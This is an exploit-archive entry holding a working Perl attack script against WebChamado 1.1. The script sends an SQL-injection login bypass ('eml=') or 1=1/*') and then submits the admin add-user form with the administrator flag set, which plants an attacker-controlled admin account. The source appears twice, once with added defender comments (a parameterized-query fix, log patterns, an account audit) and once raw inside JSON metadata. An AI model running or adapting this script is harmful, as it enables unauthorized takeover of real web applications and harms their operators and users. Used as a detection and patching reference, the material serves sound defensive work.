ID 1337DAY-ID-3166
Type zdt
Reporter CWH Underground
Modified 2008-06-13T00:00:00
Description
Exploit for unknown platform in category web applications
==========================================
WebChamado 1.1 Arbitrary Add Admin Exploit
==========================================
#!/usr/bin/perl
#============================================
# WebChamado 1.1 Arbitrary Add Admin Exploit
#============================================
#
# ,--^----------,--------,-----,-------^--,
# | ||||||||| `--------' | O .. CWH Underground Hacking Team ..
# `+---------------------------^----------|
# `\_,-------, _________________________|
# / XXXXXX /`| /
# / XXXXXX / `\ /
# / XXXXXX /\______(
# / XXXXXX /
# / XXXXXX /
# (________(
# `------'
#
#AUTHOR : CWH Underground
#DATE : 12 June 2008
#
#####################################################
#APPLICATION : WebChamado
#VERSION : 1.1
#DOWNLOAD : http://downloads.sourceforge.net/webchamado
######################################################
#
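#Note: requires magic_quotes_gpc = off on the server; with it on, PHP escapes the quote in the login field before it reaches the query.
#
#This exploit adds a user with administrator privileges; the password for that account is then received by email.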
# Flat script, no subs. It takes three command-line arguments (base URL, user
# name, e-mail), sends a login POST whose `eml` field carries a SQL-injection
# string, and, if the response looks like a logged-in page, sends a second
# POST to the admin "add user" form with rsp_adm=1 using the same cookie jar.
#
# Reviewer notes for defenders:
#  - The flaw itself is in WebChamado's PHP login code, which is not shown
#    here; presumably the `eml` value is concatenated into the SQL lookup.
#    The durable fix is a parameterized query for that lookup rather than
#    reliance on magic_quotes_gpc.
#  - Request pattern visible in this script, usable for log review: a POST to
#    admin/index.php whose body has a quote and `or 1=1` in `eml`, followed
#    by a POST to admin/corpo.php?menuadmin_responsavel=S with rsp_adm=1.
#  - After exposure, audit the application's user list for unexpected
#    accounts carrying the admin flag.
#
# The script has no `use strict` / `use warnings`; every variable below is a
# package global.
use LWP;
use HTTP::Request;
use HTTP::Cookies;
# $#ARGV is the last index, so $#ARGV + 1 is the argument count; anything
# other than exactly three arguments prints the banner and usage, then exits.
if ($#ARGV + 1 != 3)
{
print "\n==============================================\n";
print " WebChamado 1.1 Arbitrary Add Admin Exploit \n";
print " \n";
print " Discovered By CWH Underground \n";
print "==============================================\n";
print " \n";
print " \n";
print "Usage: ./xpl-webchamado.pl <WebChamado URL> <user> <email>\n";
print "Ex. ./xpl-webchamado.pl http://www.target.com/WebChamado/ cwhunderground cwh\@cwh.com\n";
exit();
}
# Positional arguments: base URL, account name, e-mail address.
$cmsurl = $ARGV[0];
$user = $ARGV[1];
$mail = $ARGV[2];
# Paths are appended with plain concatenation, so the base URL has to end in
# "/" (as in the usage example) for the resulting URLs to be well-formed.
$loginurl = $cmsurl."admin/index.php";
$adduserurl = $cmsurl."admin/corpo.php?menuadmin_responsavel=S&rsp_tipusr=U";
# Form body for the add-user request. $user and $mail are inserted as given;
# the remaining fields are fixed values. rsp_adm=1 is presumably the
# administrator flag (the field semantics live in the PHP application, not
# in this file).
$post_content = "rsp_tipusr=U&rsp_nome=".$user."&rsp_codund=01&rsp_coddep=31&rsp_codfun=46&rsp_eml=".$mail."&rsp_adm=1&rsp_mst=S&rsp_btnresponsavel=Confirmar";
print "\n..::Login Page URL::..\n";
print "$loginurl\n";
print "\n..::Add User Page URL::..\n";
print "$adduserurl\n\n";
# One user agent with a cookie jar, so whatever session cookie the login
# response sets is sent again with the second request.
$ua = LWP::UserAgent->new;
$ua->cookie_jar(HTTP::Cookies->new);
$request = HTTP::Request->new (POST => $loginurl);
# NOTE(review): `=>` auto-quotes only the bareword directly to its left
# (`Charset`), so `Accept-Charset` here parses as a subtraction of two
# barewords, not as the string "Accept-Charset". The header name actually
# sent is therefore probably not "Accept-Charset" -- confirm against a
# capture before writing a traffic signature on this header.
$request->header (Accept-Charset => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7');
$request->content_type ('application/x-www-form-urlencoded');
# Login body: the `eml` field closes a quote and parenthesis, adds an
# always-true `or 1=1`, and opens a `/*` comment; `pas` and `btn` are fixed
# strings. This is the request that depends on magic_quotes_gpc being off.
$request->content ('eml=\') or 1=1/*&pas=masteradm&btn=Enviar');
$response = $ua->request($request);
$content = $response->content;
# The login is treated as successful when the response body contains the
# literal text "index_ok"; the HTTP status code is not checked.
if ($content =~ /index_ok/)
{
print "Login Success !!!\n\n";
}
else
{
print "Login Failed !!!\n\n";
exit();
}
# Second request: submit the add-user form built above, reusing $ua and its
# cookies.
$request = HTTP::Request->new (POST => $adduserurl);
$request->content_type ('application/x-www-form-urlencoded');
$request->content ($post_content);
$response = $ua->request($request);
$content = $response->content;
# Result check: the response body must contain the user name, then "ADM",
# then the e-mail, in that order. There is no /s modifier, so `.` does not
# cross newlines and all three must appear on one line of the response.
if ($content =~ /$user.*ADM.*$mail/)
{
print "Exploit Completed !!!\n";
}
else
{
print "Exploit Failed !!!\n";
}
{"published": "2008-06-13T00:00:00", "id": "1337DAY-ID-3166", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category web applications", "enchantments": {"score": {"value": 0.4, "vector": "NONE", "modified": "2018-03-01T03:34:34", "rev": 2}, "dependencies": {"references": [{"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/LOCAL/BYPASSUAC_FODHELPER", "MSF:EXPLOIT/WINDOWS/LOCAL/BYPASSUAC_SDCLT", "MSF:EXPLOIT/LINUX/LOCAL/CPI_RUNRSHELL_PRIV_ESC", "MSF:EXPLOIT/WINDOWS/LOCAL/BYPASSUAC_SLUIHIJACK", "MSF:PAYLOAD/CMD/UNIX/REVERSE_NCAT_SSL", "MSF:AUXILIARY/SCANNER/MSMAIL/ONPREM_ENUM", "MSF:EXPLOIT/APPLE_IOS/BROWSER/WEBKIT_TRIDENT"]}, {"type": "nessus", "idList": ["FEDORA_2018-E5A8B72D0D.NASL", "UBUNTU_USN-3166-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310843008", "OPENVAS:1361412562310874800"]}, {"type": "exploitdb", "idList": ["EDB-ID:44213", "EDB-ID:44836"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148041"]}, {"type": "zdt", "idList": ["1337DAY-ID-30530", "1337DAY-ID-29911"]}, {"type": "mskb", "idList": ["KB2846071"]}, {"type": "seebug", "idList": ["SSV:92772"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:6091475B7C3358E497093045025F72F1"]}, {"type": "ubuntu", "idList": ["USN-3166-1"]}], "modified": "2018-03-01T03:34:34", "rev": 2}, "vulnersScore": 0.4}, "type": "zdt", "lastseen": "2018-03-01T03:34:34", "edition": 2, "title": "WebChamado 1.1 Arbitrary Add Admin Exploit", "href": "https://0day.today/exploit/description/3166", "modified": "2008-06-13T00:00:00", "bulletinFamily": "exploit", "viewCount": 7, "cvelist": [], "sourceHref": "https://0day.today/exploit/3166", "references": [], "reporter": "CWH Underground", "sourceData": "==========================================\r\nWebChamado 1.1 Arbitrary Add Admin Exploit\r\n==========================================\r\n\r\n\r\n\r\n#!/usr/bin/perl\r\n#============================================\r\n# WebChamado 1.1 Arbitrary Add Admin 
Exploit\r\n#============================================\r\n#\r\n# ,--^----------,--------,-----,-------^--,\r\n# | ||||||||| `--------' | O\t.. CWH Underground Hacking Team ..\r\n# `+---------------------------^----------|\r\n# `\\_,-------, _________________________|\r\n# / XXXXXX /`| /\r\n# / XXXXXX / `\\ /\r\n# / XXXXXX /\\______(\r\n# / XXXXXX / \r\n# / XXXXXX /\r\n# (________( \r\n# `------'\r\n#\r\n#AUTHOR : CWH Underground\r\n#DATE : 12 June 2008\r\n#\r\n#####################################################\r\n#APPLICATION : WebChamado\r\n#VERSION : 1.1\r\n#DOWNLOAD : http://downloads.sourceforge.net/webchamado\r\n######################################################\r\n#\r\n#Note: magic_quotes_gpc = off\r\n#\r\n#This Exploit will Add user to administrator's privilege and you will get password from email..\r\n\r\n\r\n\r\nuse LWP;\r\nuse HTTP::Request;\r\nuse HTTP::Cookies;\r\n\r\nif ($#ARGV + 1 != 3)\r\n{\r\n print \"\\n==============================================\\n\";\r\n print \" WebChamado 1.1 Arbitrary Add Admin Exploit \\n\";\r\n print \" \\n\";\r\n print \" Discovered By CWH Underground \\n\";\r\n print \"==============================================\\n\";\r\n print \" \\n\";\r\n print \" \\n\"; \r\n print \"Usage: ./xpl-webchamado.pl <WebChamado URL> <user> <email>\\n\";\r\n print \"Ex. 
./xpl-webchamado.pl http://www.target.com/WebChamado/ cwhunderground cwh\\@cwh.com\\n\";\r\n exit();\r\n}\r\n\r\n$cmsurl = $ARGV[0];\r\n$user = $ARGV[1];\r\n$mail = $ARGV[2];\r\n\r\n\r\n$loginurl = $cmsurl.\"admin/index.php\";\r\n$adduserurl = $cmsurl.\"admin/corpo.php?menuadmin_responsavel=S&rsp_tipusr=U\";\r\n$post_content = \"rsp_tipusr=U&rsp_nome=\".$user.\"&rsp_codund=01&rsp_coddep=31&rsp_codfun=46&rsp_eml=\".$mail.\"&rsp_adm=1&rsp_mst=S&rsp_btnresponsavel=Confirmar\";\r\n\r\nprint \"\\n..::Login Page URL::..\\n\";\r\nprint \"$loginurl\\n\";\r\nprint \"\\n..::Add User Page URL::..\\n\";\r\nprint \"$adduserurl\\n\\n\";\r\n\r\n$ua = LWP::UserAgent->new;\r\n$ua->cookie_jar(HTTP::Cookies->new);\r\n\r\n$request = HTTP::Request->new (POST => $loginurl);\r\n$request->header (Accept-Charset => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7');\r\n$request->content_type ('application/x-www-form-urlencoded');\r\n$request->content ('eml=\\') or 1=1/*&pas=masteradm&btn=Enviar');\r\n\r\n$response = $ua->request($request);\r\n\r\n$content = $response->content;\r\n\r\nif ($content =~ /index_ok/)\r\n{\r\n print \"Login Success !!!\\n\\n\";\r\n}\r\nelse\r\n{\r\n print \"Login Failed !!!\\n\\n\";\r\n exit();\r\n}\r\n\r\n$request = HTTP::Request->new (POST => $adduserurl);\r\n$request->content_type ('application/x-www-form-urlencoded');\r\n$request->content ($post_content);\r\n$response = $ua->request($request);\r\n\r\n$content = $response->content;\r\n\r\nif ($content =~ /$user.*ADM.*$mail/)\r\n{\r\n print \"Exploit Completed !!!\\n\";\r\n}\r\nelse\r\n{\r\n print \"Exploit Failed !!!\\n\";\r\n}\r\n\r\n\r\n\r\n\n# 0day.today [2018-03-01] #"}
{}